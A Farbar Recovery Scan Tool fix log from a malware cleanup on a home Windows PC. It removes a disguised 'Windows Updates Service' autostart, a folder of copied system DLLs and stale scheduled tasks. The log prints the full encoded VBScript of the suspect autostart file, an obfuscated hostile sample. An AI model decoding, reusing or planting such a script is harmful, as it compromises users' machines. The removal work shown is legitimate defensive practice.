Fix result of Farbar Recovery Scan Tool (x64) Version: 30-08-2022
Ran by Dominik Durna (07-09-2022 08:36:21) Run:1
Running from C:\Users\Dominik Durna\Desktop
Loaded Profiles: Dominik Durna
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start::
CloseProcesses:

VirusTotal: C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe
VirusTotal: C:\Users\Dominik Durna\AppData\Roaming\libraries\MicrosoftRuntimeUpdate.vbe
Folder: C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files
Folder: C:\Users\Dominik Durna\AppData\Roaming\libraries
File: C:\Users\Dominik Durna\AppData\Roaming\Leadertech\PowerRegister\Xerox Product Registration.exe

CMD: type "C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe"
CMD: type "C:\Users\Dominik Durna\AppData\Roaming\libraries\MicrosoftRuntimeUpdate.vbe"
CMD: dir /a /o "C:\Users\Dominik Durna\AppData\Roaming"

HKU\S-1-5-21-1210618106-4000754862-3745215314-1002\...\Run: [Windows Updates Service] => C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe [1000 2021-04-24] () [File not signed] <==== ATTENTION
Task: {4398EEA0-6731-4AC9-9F07-5604B3FA8DC3} - \Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance -> No File <==== ATTENTION
Task: {62F56C1C-858D-43CE-BC6B-F4DAD4642517} - \Lenovo\ImController\Lenovo iM Controller Monitor -> No File <==== ATTENTION
Task: {C504E025-868F-4215-9872-4B72CA49B212} - System32\Tasks\Lenovo\Vantage\Schedule\VantageTelemetryAddinTask => C:\Program Files (x86)\Lenovo\VantageService\3.6.15.0\ScheduleEventAction.exe VantageTelemetryAddinTask (No File)
2022-09-06 08:52 - 2020-12-21 03:10 - 000000000 ____D C:\Users\Dominik Durna\AppData\Roaming\libraries
C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKU\S-1-5-21-1210618106-4000754862-3745215314-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com/

EmptyTemp:
End::
*****************

Processes closed successfully.
VirusTotal: C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe => https://www.virustotal.com/gui/file/f02330210f2adc9aafb2d8c8908085ee63f75f4bc9f47774548d29a839d03320/detection/f-f02330210f2adc9aafb2d8c8908085ee63f75f4bc9f47774548d29a839d03320-1662532583
"VirusTotal: C:\Users\Dominik Durna\AppData\Roaming\libraries\MicrosoftRuntimeUpdate.vbe" => not found

========================= Folder: C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files ========================

2020-12-19 05:50 - 2021-04-24 21:51 - 000001000 ____A [0B26F90EE08643298DD7652488CC0B8F] () C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe

====== End of Folder: ======


========================= Folder: C:\Users\Dominik Durna\AppData\Roaming\libraries ========================

2020-12-21 03:10 - 2018-07-12 10:19 - 000669896 ____A [561F1AB95F4F01C691BDABA5FD5C67FC] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\advapi32.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [7082B5ACC63A7F8E4D4D5546C5241733] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-console-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [65FB1CD0DCF4A514568470530EE92CF4] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-datetime-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [0E8DBD91222CF85A7828962DB82413B7] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-debug-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [4087A520AAA2B570DC786C1F2D3676B6] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-delayload-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [FAD5B5CC65905639BCAABD8AC7D5E13C] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-errorhandling-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [26E59E91A4AB81EE913C8A5FFB2B34B9] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-fibers-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000005120 ____A [E0376D6651F9C7777C33803BAA638DDC] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-file-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000011616 ____A [03DD721008F2C381D5D5C7CF57509D23] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-file-l1-2-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000011616 ____A [217CA9B1F7E0C141CFC7F00F17B76CA0] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-file-l2-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [CB54E54F14148D4121B1357D62C901BD] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-handle-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [23515E121583C52CA0B4EE063DCA2C9C] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-heap-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [0F432E4A471EEC2E9041D6B1DE43E260] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-interlocked-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [F25B6E9A077C6F05B3EC1F65D613ED18] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-io-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [ED43CBB763B40DCA60CF224D70C0DD2C] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-libraryloader-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004096 ____A [C3496D5FE8EF646D8B25A9F6B2235A6F] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-localization-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000014176 ____A [561211C711778A0D17B5B00D5DEBD5E9] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-localization-l1-2-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004096 ____A [1F08EED9006D896D7D1C5453E9EAC988] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-localregistry-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [2E76A2CC12658EF39BFCDB6A76159FDB] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-memory-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [3189A9449F4F3991B26163E9C82402F7] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-misc-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [F3D6D9E61B78D5D2D4C7CA486FFB8F5B] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-namedpipe-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [13F972E68302F7C74185036C989DA5F9] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-processenvironment-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004608 ____A [1C4284508D0DDFB0635264AD0E5DBC57] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-processthreads-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012128 ____A [4A6FC6C389A3D807163DD5EDF362174D] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-processthreads-l1-1-1.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [5FD7C7B816B337BC785F66E16F8A32C2] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-profile-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [038E4CC46548BD7C85C8D2FD5EF01E8C] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [F83E64A7C241E3DE948722FD7B688AB3] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-string-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004096 ____A [46D382A365850E116602545DF283EB46] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-synch-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012128 ____A [0CDF76C035CAF0BE4A6ED32682CE6079] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-synch-l1-2-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004096 ____A [E735F537FD6469250DA5A33328DD1DA0] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-sysinfo-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004608 ____A [B95BD5B1ACA4562E750F48A16F0CB405] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-threadpool-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000011616 ____A [DC07B990D787B9AED770693FF90D173A] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-timezone-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [A97E6B70CCD03870A06BD57DDC6BE0E0] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-ums-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [03FB957E3E68F6A8D98CE05706CC41B9] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-util-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [629697F63A969AFB06FD9BAD039E42D1] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-xstate-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000011616 ____A [A7620B1EA082D65549F0EC8C88200ACD] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-core-xstate-l2-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012640 ____A [A98EC7EDB339CD967E5CBD5EEC174CEB] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-conio-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000015712 ____A [D8F7A8440C5B23A587D981E7B9A4892C] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-convert-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012128 ____A [0753722E5BD0AF130C1B465F2981477C] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-environment-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000013664 ____A [EBA98AF7BA9FC4696BFD3F03D43CE07B] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-filesystem-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012640 ____A [C2F694722F8D98990B218ECAB729B0FE] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-heap-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012128 ____A [62ED9DA33AFE5624A08D9427527536FE] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-locale-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000020832 ____A [CAB18EAC01B9FCF6A0CA74E95FADB8B7] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-math-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000019808 ____A [E9C7DF2BC9C5157F2195737948DBFA0B] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-multibyte-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000063840 ____A [92375150AD3F19431B49793DC7111962] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-private-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012640 ____A [A4FA9CA07855A7F237D1908E62B5B1C7] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-process-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000016224 ____A [4CDCE034568C1177325799A60F987F27] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-runtime-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000017760 ____A [020E0DCC82A7C5AFDEE3FBA57C5F30D3] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-stdio-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000017760 ____A [6A2C655BC6B7E2EDFC98B632B521697D] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-string-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000014176 ____A [CB20CCF93E34CC08AB4B58A344E76DD1] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-time-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000012128 ____A [1EA4F3D5312C15A64904A6E9E457612D] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-crt-utility-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000010752 ____A [F49E92B50CED5C9F1725D3C0329FD933] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-advapi32-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [F5CEF064C7E6D95DA86B9D064A56A969] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-advapi32-l2-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000002560 ____A [64A4AB126E24FD3F58EBE64852773DB5] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-normaliz-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000005632 ____A [0E6FBF19D9DFBB77316C23DF91F8A101] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-ole32-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [9108540E866F75C7AF2B91DD921A8091] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-shell32-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000009728 ____A [AFC3DB5C6EB8CA8017DDB81D6C0AD02A] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000005632 ____A [FB4045578F5180BDB1963AB352B78548] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000004096 ____A [72723D3E4781BADC62C3180C137E7B23] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-user32-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [9094039A00485F71C4DE64BF51F64C46] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-downlevel-version-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000006144 ____A [90DD571D2E8128FBFF6720952266E96C] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-security-base-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [99C885A040571D5CC7B4497109BFFE6E] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-security-lsalookup-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003072 ____A [F3B3E3370C767D623B35FEDC8FA4C3FB] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-security-sddl-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000002560 ____A [7FDFD0AF74C84A34A5EF289EB6044F32] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-service-core-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000002560 ____A [B492E85A40741A77C5B5D438381F5474] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-service-management-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000002560 ____A [F74D145F733EF4ACE3E1BF38EC4E4418] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-service-management-l2-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000003584 ____A [9E229D60DA2FAB875C6A6AA451E6D028] (Microsoft Corporation) [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\api-ms-win-service-winsvc-l1-1-0.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 001291200 ____A [F3523E611AB0B0977B048263A12DCF2A] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\kernel32.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000639808 ____A [C754FA2EB5BADC2C841133B30DD004E3] (Microsoft Corporation -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\msvcp140.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000089416 ____A [419CBC91B0847E3D1457AA5AF6847B8C] (Microsoft Corporation -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\vcruntime140.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000113488 ____A [4A550C268550D49ABBAFF02E4A1ABF24] (Microsoft Corporation -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\vcruntime140d.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000000892 ____A [00000000000000000000000000000000] () [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\vcruntime140dd.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000000716 ____A [16DEE6A3274CCF1C2D29F3B5AD2E4C56] () [File not signed] C:\Users\Dominik Durna\AppData\Roaming\libraries\vcruntime140gg.dll
2020-12-21 03:10 - 2018-07-12 10:19 - 000355872 ____A [6F997D98C6A30D79C622811FBAB9119E] (Microsoft Windows -> Microsoft Corporation) C:\Users\Dominik Durna\AppData\Roaming\libraries\ws2_32.dll

====== End of Folder: ======


========================= File: C:\Users\Dominik Durna\AppData\Roaming\Leadertech\PowerRegister\Xerox Product Registration.exe ========================

C:\Users\Dominik Durna\AppData\Roaming\Leadertech\PowerRegister\Xerox Product Registration.exe
File not signed
MD5: 19DC5F93487DB8F4917D396D3BF561CF
Creation and modification date: 2022-01-15 15:45 - 2014-04-10 18:34
Size: 001786880
Attributes: ----A
Company Name: Xerox/Leader Technologies
Internal Name: XeroxUniversal
Original Name: XeroxUniversal.exe
Product: PowerReg
Description: Product Registration
File Version: 1.02
Product Version: 1.02
Copyright: Copyright (C) 2010
VirusTotal: https://www.virustotal.com/gui/file/b31ed4807259472689f984e348f10e15125fae9df1298e6befddd5411a2a7dda/detection/f-b31ed4807259472689f984e348f10e15125fae9df1298e6befddd5411a2a7dda-1656490147

====== End of File: ======


========= type "C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files\Windows Updates Service.vbe" =========

#@~^zwMAAA==G	P3MDKDP"+k;:PH+XY@#@&UE4,Kl!/+vHj+1W	Nd#@#@&q/^Db2Yc?snw`HjmGx9dC&TZ!*@#@&Ax9~?!4@#@&Gkh~7k/!CV1ww@#@&j+DP7kdECs1w2P{~ZM+COr4%n1YcJqj1DraYc?tV^E#@#@&^W!xOnMP',PD!+@#@&	4k^+,mGEUOD~',PD!+@#@&S+4drD+~',EShAcoKWo^+c^WsR1cOv++WF,8**2G cArx9WS/RNrdaVCX d+M\r^RmGhr@#@&m4n13dDDbxo,',EwbxLP x~q,Oh,f!ZPJ,'~h4kkO+@#@&kYCY!dP{P-rkEls^aw I!Uvm4m0/YMk	L~,!~~,K.;#@#@&(0,/YmO;/,',!~K4n	@#@&mK;xD+.~{PsCsk+@#@&Ask+@#@&nmE/`yq#@#@&3x9P(W@#@&UN@#@&DO;D	mKNn/OCDEdP{~J8J@#@&M+Y;.	mGNdDlO!/,'P7kk;l^m2wcD;UvJm4.Ws+P R4+mN^+d/~R Nr/m8VOL2!POR.:GYR9+8!oTkxTOaGDD'1 y ~4DYw=&zShhcLGWTVR^Wh Oc1vy+c8,q*l&G+ SkUNKAkO[b/aVlHOknD7k^+cmGhr~!BWl^/+*@#@&k6PM+OE.U1W[+kOlDEd~@!@*PT~Dtnx@#@&M+O!D	mW9+kOlDEd'7kd;mVma2RMExvEWkM+6WaPRUKO.+sGYPR/M+lOnhDG0bsP;k+MJ~Z~6CVk+b@#@&DnO!Dx1GN/YmO;/{\b/;ls^aw D!U`r0r.0Wa~ xGOMnsWOP t+mN^n/kPRxhRr	/YmUmPOh~EJ!/DEJ~R /OlMOO9+8;To+.Rk+.\.,hd=vZ!!,tDOw=z&hSh LKWo^nR1W:c1*,+ ycq,q*l&{ cAk	NGAkONrdaVCX dD-bmRmK:rS!B0CVk+b@#@&2x9~q6@#@&PTQBAA==^#~@ 
========= End of CMD: =========


========= type "C:\Users\Dominik Durna\AppData\Roaming\libraries\MicrosoftRuntimeUpdate.vbe" =========

匀礀猀琀쎩m nemožť nalÃ꤀稀琀 甀瘀攀搀攀渀쎽 soubor.

========= End of CMD: =========


========= dir /a /o "C:\Users\Dominik Durna\AppData\Roaming" =========

 Volume in drive C is Windows-SSD
 Volume Serial Number is B46C-34B6

 Directory of C:\Users\Dominik Durna\AppData\Roaming

20.02.2022  02:17    <DIR>          .
20.02.2022  02:17    <DIR>          ..
09.11.2021  19:43    <DIR>          Adobe
04.12.2020  12:03    <DIR>          Brother
02.12.2020  11:46    <DIR>          ControlCenter4
24.08.2021  12:29    <DIR>          CPY_SAVES
16.02.2021  19:41    <DIR>          GIMP
02.12.2020  11:42    <DIR>          InstallShield
15.01.2022  15:45    <DIR>          Leadertech
06.09.2022  08:52    <DIR>          libraries
19.08.2022  13:03    <DIR>          Microsoft
21.11.2020  03:14    <DIR>          NVIDIA
21.10.2021  00:26    <DIR>          SecuROM
26.04.2021  11:39    <DIR>          StairportSceneries
21.11.2020  03:54    <DIR>          The Sims 3 - Complete Edition_Uninstall
04.04.2021  13:41    <DIR>          Transport Fever 2
30.03.2021  15:19    <DIR>          ViberPC
24.04.2021  21:51    <DIR>          Windows Updates Files
21.11.2020  02:02    <DIR>          WinRAR
15.01.2022  15:44    <DIR>          Xerox
21.08.2022  09:04    <DIR>          Zoom
               0 File(s)              0 bytes
              21 Dir(s)  68 045 656 064 bytes free

========= End of CMD: =========

"HKU\S-1-5-21-1210618106-4000754862-3745215314-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Windows Updates Service" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4398EEA0-6731-4AC9-9F07-5604B3FA8DC3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4398EEA0-6731-4AC9-9F07-5604B3FA8DC3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62F56C1C-858D-43CE-BC6B-F4DAD4642517}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62F56C1C-858D-43CE-BC6B-F4DAD4642517}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\ImController\Lenovo iM Controller Monitor" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C504E025-868F-4215-9872-4B72CA49B212}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C504E025-868F-4215-9872-4B72CA49B212}" => removed successfully
C:\Windows\System32\Tasks\Lenovo\Vantage\Schedule\VantageTelemetryAddinTask => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\Vantage\Schedule\VantageTelemetryAddinTask" => removed successfully
C:\Users\Dominik Durna\AppData\Roaming\libraries => moved successfully
C:\Users\Dominik Durna\AppData\Roaming\Windows Updates Files => moved successfully
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => removed successfully
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => removed successfully
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\MCODS => removed successfully
"HKU\S-1-5-21-1210618106-4000754862-3745215314-1002\Software\Microsoft\Internet Explorer\Main\\Secondary Start Pages" => removed successfully

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1106000623 B
Java, Discord, Steam htmlcache => 710869956 B
Windows/system/drivers => 17376979 B
Edge => 0 B
Chrome => 1559927908 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 560878 B
systemprofile32 => 561310 B
LocalService => 635306 B
NetworkService => 1991114 B
Dominik Durna => 1539824610 B

RecycleBin => 131094002 B
EmptyTemp: => 4.7 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 09:10:56 ====